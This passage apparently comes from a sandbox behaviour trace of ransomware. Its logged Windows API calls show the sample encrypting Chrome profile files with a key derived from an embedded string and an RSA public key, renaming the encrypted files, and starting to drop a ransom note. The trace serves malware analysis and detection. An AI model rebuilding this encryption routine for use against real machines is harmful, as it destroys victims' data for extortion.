lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.661] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.661] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.661] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.661] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.662] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.662] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.662] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.662] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.662] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.662] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.662] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.663] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.663] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.663] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.663] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.663] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.663] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.663] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.664] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.664] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.664] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x169, lpOverlapped=0x0) returned 1 [0264.664] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x169, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x170) returned 1 [0264.664] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x170, lpOverlapped=0x0) returned 1 [0264.664] CloseHandle (hObject=0x5d48) returned 1 [0264.664] CloseHandle (hObject=0x5d40) returned 1 [0264.664] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), bFailIfExists=0) returned 1 [0264.671] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", dwFileAttributes=0x0) returned 1 [0264.672] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.gsg")) returned 1 [0264.674] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\google profile.ico.fuck")) returned 1 [0264.675] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0264.675] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0264.675] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0264.675] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.675] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.675] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.675] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.675] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0264.676] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.676] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.676] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0264.694] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.694] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.694] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d72c | out: lpSystemTimeAsFileTime=0x2b9d72c) [0264.694] GetLastError () returned 0x0 [0264.694] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log")) returned 0x20 [0264.694] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log", dwFileAttributes=0x80) returned 1 [0264.695] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.695] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0264.696] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg", dwFileAttributes=0x2) returned 1 [0264.697] CryptAcquireContextA (in: phProv=0x2b9c728, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c728*=0x2e75dd0) returned 1 [0264.698] CryptCreateHash (in: hProv=0x2e75dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c72c | out: phHash=0x2b9c72c) returned 1 [0264.698] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.698] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.698] CryptDeriveKey (in: hProv=0x2e75dd0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c718 | out: phKey=0x2b9c718*=0x2e7da00) returned 1 [0264.699] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c734, pcbBinary=0x2b9c714, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.699] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c734, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710 | out: pvStructInfo=0x2b9c708, pcbStructInfo=0x2b9c710) returned 1 [0264.699] CryptAcquireContextA (in: phProv=0x2b9c724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c724*=0x2e75e58) returned 1 [0264.699] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75e58, dwCertEncodingType=0x1, pInfo=0x2eae7a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae7d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae7d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c71c | out: phKey=0x2b9c71c*=0x2e7eac0) returned 1 [0264.699] CryptEncrypt (in: hKey=0x2e7eac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c70c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c70c*=0x80) returned 1 [0264.699] CryptEncrypt (in: hKey=0x2e7eac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e765c8*, pdwDataLen=0x2b9c720*=0x18, dwBufLen=0x80 | out: pbData=0x2e765c8*, pdwDataLen=0x2b9c720*=0x80) returned 1 [0264.699] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e765c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x2e765c8*, lpNumberOfBytesWritten=0x2b9c730*=0x80, lpOverlapped=0x0) returned 1 [0264.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x13e, lpOverlapped=0x0) returned 1 [0264.703] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x13e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x140) returned 1 [0264.703] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x140, lpOverlapped=0x0) returned 1 [0264.703] CloseHandle (hObject=0x5d4c) returned 1 [0264.703] CloseHandle (hObject=0x5d50) returned 1 [0264.704] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log"), bFailIfExists=0) returned 1 [0264.707] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log", dwFileAttributes=0x0) returned 1 [0264.708] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log.gsg")) returned 1 [0264.709] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\000003.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\000003.log.fuck")) returned 1 [0264.710] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0264.710] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.710] CryptReleaseContext (hProv=0x2e75dd0, dwFlags=0x0) returned 1 [0264.710] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.710] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.710] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.710] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.710] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0264.710] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0264.710] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\readme_back_files.htm")) returned 0xffffffff [0264.710] AreFileApisANSI () returned 1 [0264.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb5b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 142 [0264.710] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.711] GetFileType (hFile=0x5d48) returned 0x1 [0264.711] WriteFile (in: hFile=0x5d48, 